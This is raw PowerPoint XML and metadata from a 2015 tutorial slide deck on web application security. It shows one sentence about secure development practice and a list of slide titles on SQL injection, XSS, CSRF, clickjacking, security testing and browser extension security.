              </a:rPr>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-13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development</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-114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practice,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-7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employing</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-2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best</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-105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practices</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-75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may  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>help</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-110" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-75" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>mitigate</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-130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some</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-135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of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-70" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>issues</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constant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5883</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Custom</PresentationFormat>
  <Paragraphs>855</Paragraphs>
  <Slides>92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92</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="101" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Constantia</vt:lpstr>
      <vt:lpstr>Symbol</vt:lpstr>
      <vt:lpstr>Tempus Sans ITC</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Wingdings 2</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Background</vt:lpstr>
      <vt:lpstr>Web application security vulnerability</vt:lpstr>
      <vt:lpstr>Web security vulnerability trend</vt:lpstr>
      <vt:lpstr>Impact of security vulnerability</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Example incident: Information deletion</vt:lpstr>
      <vt:lpstr>Example incident: Information modification</vt:lpstr>
      <vt:lpstr>Example incident: Information modification</vt:lpstr>
      <vt:lpstr>Example incident: Profile change</vt:lpstr>
      <vt:lpstr>Browser vulnerabilities: extension</vt:lpstr>
      <vt:lpstr>Browser vulnerabilities: Example</vt:lpstr>
      <vt:lpstr>More list of incidents</vt:lpstr>
      <vt:lpstr>What is wrong in these programs?</vt:lpstr>
      <vt:lpstr>Tutorial outline</vt:lpstr>
      <vt:lpstr>Part I: Application security vulnerability</vt:lpstr>
      <vt:lpstr>SQL Injection (SQLI) vulnerabilities</vt:lpstr>
      <vt:lpstr>Legitimate access to an account (step 1)</vt:lpstr>
      <vt:lpstr>Legitimate access to an account (step 2)</vt:lpstr>
      <vt:lpstr>Access to an account through SQL Injection (step 1)</vt:lpstr>
      <vt:lpstr>Access through an SQL Injection attack (step 2)</vt:lpstr>
      <vt:lpstr>Example of JSP code with vulnerability</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>Cross Site Scripting (XSS) vulnerabilities</vt:lpstr>
      <vt:lpstr>Posting a benign comment (step 1)</vt:lpstr>
      <vt:lpstr>Viewing a benign comment (step 2)</vt:lpstr>
      <vt:lpstr>Posting a malicious comment (step 1)</vt:lpstr>
      <vt:lpstr>Viewing a malicious comment (step 2)</vt:lpstr>
      <vt:lpstr>Viewing a malicious comment (step 3)</vt:lpstr>
      <vt:lpstr>Posting a malicious script to steal cookie</vt:lpstr>
      <vt:lpstr>XSS attack types</vt:lpstr>
      <vt:lpstr>A reflected XSS attack example</vt:lpstr>
      <vt:lpstr>Cross‐Site Request Forgery (CSRF)</vt:lpstr>
      <vt:lpstr>A CSRF attack example (Step 1 of 3)</vt:lpstr>
      <vt:lpstr>A CSRF attack example (Step 1 of 3) cont.</vt:lpstr>
      <vt:lpstr>A CSRF attack example (Step 2 of 3)</vt:lpstr>
      <vt:lpstr>A CSRF attack example (Step 3 of 3)</vt:lpstr>
      <vt:lpstr>Stored CSRF attack example</vt:lpstr>
      <vt:lpstr>Part I: Summary</vt:lpstr>
      <vt:lpstr>References</vt:lpstr>
      <vt:lpstr>Part II: Mitigation of web application vulnerability</vt:lpstr>
      <vt:lpstr>Security testing</vt:lpstr>
      <vt:lpstr>Security testing steps</vt:lpstr>
      <vt:lpstr>Security testing steps (cont.)</vt:lpstr>
      <vt:lpstr>Testing technique</vt:lpstr>
      <vt:lpstr>Attack signature</vt:lpstr>
      <vt:lpstr>Attack signature (cont.)</vt:lpstr>
      <vt:lpstr>Testing techniques (cont.)</vt:lpstr>
      <vt:lpstr>Static analysis</vt:lpstr>
      <vt:lpstr>Static analysis: Tainted data flow</vt:lpstr>
      <vt:lpstr>Static analysis: Tainted data flow</vt:lpstr>
      <vt:lpstr>Code randomization</vt:lpstr>
      <vt:lpstr>Part II: Summary</vt:lpstr>
      <vt:lpstr>References</vt:lpstr>
      <vt:lpstr>References</vt:lpstr>
      <vt:lpstr>Part III: Clickjacking</vt:lpstr>
      <vt:lpstr>What is clickjacking?</vt:lpstr>
      <vt:lpstr>Background on HTML: reducing opacity level from 50%  to 0%</vt:lpstr>
      <vt:lpstr>Displaying of the iframe with zero opacity level in your  browser</vt:lpstr>
      <vt:lpstr>Clickjacking examples in the real‐world</vt:lpstr>
      <vt:lpstr>Creating a malicious page for Likejacking attack</vt:lpstr>
      <vt:lpstr>Likejacking code snippet</vt:lpstr>
      <vt:lpstr>HTML display of the created web page for Likejacking</vt:lpstr>
      <vt:lpstr>Hijacking of Adobe Flash Player Setting</vt:lpstr>
      <vt:lpstr>How do we prevent Clickjacking?</vt:lpstr>
      <vt:lpstr>Framebusting effectiveness</vt:lpstr>
      <vt:lpstr>Example of advanced attack types</vt:lpstr>
      <vt:lpstr>Attack type: double framing</vt:lpstr>
      <vt:lpstr>Attack type: reflective XSS filtering</vt:lpstr>
      <vt:lpstr>Attack type – Clobbering of JavaScript object</vt:lpstr>
      <vt:lpstr>Attack type – Restricting JavaScript</vt:lpstr>
      <vt:lpstr>Defense mechanism: Client‐side</vt:lpstr>
      <vt:lpstr>Defense mechanism: Server‐side</vt:lpstr>
      <vt:lpstr>Part IV: Browser Security</vt:lpstr>
      <vt:lpstr>Browser Security</vt:lpstr>
      <vt:lpstr>Browser Security</vt:lpstr>
      <vt:lpstr>Browser Security: Extension</vt:lpstr>
      <vt:lpstr>Addons, Plugins or Extensions ?</vt:lpstr>
      <vt:lpstr>A popular extension from Firefox</vt:lpstr>
      <vt:lpstr>Example extensions from Firefox</vt:lpstr>
      <vt:lpstr>Architecture for extensions</vt:lpstr>
      <vt:lpstr>Vulnerable and malicious extensions</vt:lpstr>
      <vt:lpstr>Vulnerable and malicious extensions</vt:lpstr>
      <vt:lpstr>Vulnerable and malicious extensions</vt:lpstr>
      <vt:lpstr>Detection techniques of vulnerable and malicious  extensions</vt:lpstr>
      <vt:lpstr>Mitigation techniques of vulnerable and  malicious extensions</vt:lpstr>
      <vt:lpstr>Mitigation techniques of vulnerable and  malicious extensions</vt:lpstr>
      <vt:lpstr>Mitigation techniques of vulnerable and  malicious extensions</vt:lpstr>
      <vt:lpstr>Detection techniques of vulnerable and  malicious extensions</vt:lpstr>
      <vt:lpstr>Detection techniques of vulnerable and malicious  extensions</vt:lpstr>
      <vt:lpstr>References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PowerPoint - ACM-SAC-2015-Tutorial-HS-March31.pptx</dc:title>
  <dc:creator>Instructor</dc:creator>
  <cp:lastModifiedBy>Hossain Shahriar</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-03-09T17:05:57Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-10-06T18:02:39Z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2015-03-31T00:00:00Z</vt:filetime>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="Creator">
    <vt:lpwstr>PScript5.dll Version 5.2.2</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="LastSaved">
    <vt:filetime>2018-03-09T00:00:00Z</vt:filetime>
  </property>
</Properties>
</file>